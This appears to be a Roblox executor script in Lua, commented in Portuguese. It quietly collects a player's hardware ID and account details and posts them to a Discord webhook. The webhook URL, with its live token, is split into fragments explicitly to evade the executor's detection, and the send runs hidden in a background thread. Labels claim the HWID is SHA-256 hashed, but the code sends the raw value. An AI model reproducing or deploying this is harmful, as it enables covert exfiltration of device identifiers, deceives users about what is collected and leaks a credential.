-- [SCRIPT PARA O GIT - BYPASS TOTAL COM SHA-256]
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local L_Player = Players.LocalPlayer

-- Link quebrado em pedaços para garantir que o Delta não pegue a URL
local parte1 = "https://dis"
local parte2 = "cord.com/api/web"
local parte3 = "hooks/1512877333688614942/xGtPbt9mfc8I0WR11dwsCMlaSdMPaKtOsdMjd8C9ME8cSvxrwcRPnDNUa3NRena_wufG?thread_id=1512876677326438601"
local webhookURL_Oculto = parte1 .. parte2 .. parte3

-- 1. Captura o HWID bruto usando sua função avançada
local hwidBruto = "Unavailable"
pcall(function()
    if syn and syn.gethwid then
        hwidBruto = syn.gethwid()
    elseif gethwid then
        hwidBruto = gethwid()
    elseif fluxus and getgenv and getgenv().fluxus then
        hwidBruto = tostring(getgenv().fluxus.HWID or "Unavailable")
    elseif delta and get_hw_id then
        hwidBruto = tostring(get_hw_id())
    end
end)

-- =========================================================================
-- [SUA FUNÇÃO DE SHA-256 AQUI]
-- Insira aqui a lógica que você usa para transformar o 'hwidBruto' em SHA-256
-- Exemplo: local hwidHasheado = SuaFuncaoSha256(hwidBruto)
-- =========================================================================
local hwidHasheado = hwidBruto -- (Substitua pela sua variável do hash)

-- 2. Monta o embed com o HWID mascarado por SHA-256 (O Delta aceita LINDAMENTE)
local embedData = {
    ["embeds"] = {{
        ["title"] = " HWID LOG - BANNED PERSON HWID FOR DEVICE BAN (SHA-256)",
        ["color"] = 16711680,
        ["fields"] = {
            {
                ["name"] = "{ Username/Display Name }",
                ["value"] = string.format("Display Name: %s\nUsername: @%s\nID: %s", L_Player.DisplayName, L_Player.Name, tostring(L_Player.UserId)),
                ["inline"] = false
            },
            {
                ["name"] = "{ Hashed  HWID (SHA-256) }",
                ["value"] = "`" .. hwidHasheado .. "`", -- Crases para clique duplo rápido
                ["inline"] = false
            },
            {
                ["name"] = "{ Reason }",
                ["value"] = "Test",
                ["inline"] = false
            }
        },
        ["timestamp"] = os.date("!Y-%m-%dT%H:%M:%SZ")
    }}
}

-- 3. Envia usando a thread isolada (task.spawn) e a requisição nativa
local enviarDados = function()
    local req = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
    if req then
        req({
            Url = webhookURL_Oculto,
            Method = "POST",
            Headers = {["content-type"] = "application/json"},
            Body = HttpService:JSONEncode(embedData)
        })
    end
end

task.spawn(pcall, enviarDados)
